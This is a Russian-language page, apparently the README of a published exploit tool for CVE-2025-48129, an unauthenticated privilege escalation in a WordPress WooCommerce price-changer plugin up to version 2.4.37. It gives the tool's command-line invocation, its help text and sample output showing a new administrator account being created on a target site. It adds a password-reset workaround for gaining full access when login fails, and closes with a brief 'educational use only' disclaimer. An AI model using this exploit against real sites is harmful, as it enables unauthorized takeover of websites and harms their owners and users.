
WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 уязвим для повышения привилегий
<= 2.4.37CVE-2025-481299.8 (Критический)Неаутентифицированные злоумышленники могут повысить привилегии, создав учётную запись администратора без необходимости предварительного доступа. Это позволяет полностью захватить сайт WordPress.
Классифицируется как: OWASP A7 – Ошибки идентификации и аутентификации
Этот скрипт на Python нацелен на уязвимые версии плагина и регистрирует нового администратора WordPress, используя только email и пароль (хешированный через MD5).
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin
python CVE-2025-48129.py -help
usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]
CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://site.com/)
-mail, --mail MAIL Email for the new Admin account
-p, --password PASSWORD Password to set (default: nxploitadmin)
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!
[*] Login credentials:
Username: [email protected]
Password: 21232f297a57a5a743894a0e4a801fc3
[*] If login fails, reset the password manually via:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
В некоторых случаях вход непосредственно с выбранным паролем может не сработать.
Это не ошибка в эксплойте, а результат того, как уязвимый плагин передаёт хешированные пароли во внутреннюю систему создания пользователей WordPress.
Если вам не удаётся войти, просто сбросьте пароль по электронной почте, используя следующий URL:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
WordPress отправит письмо для сброса пароля на созданную вами учётную запись администратора, что даст вам полный доступ.
Этот инструмент предоставляется только для образовательных целей и санкционированного тестирования на проникновение.
Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим скриптом.
Автор: Nxploited (Khaled_alenazi)